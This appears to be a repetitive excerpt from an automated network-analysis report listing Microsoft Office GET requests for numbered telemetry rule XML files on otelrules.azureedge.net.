              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
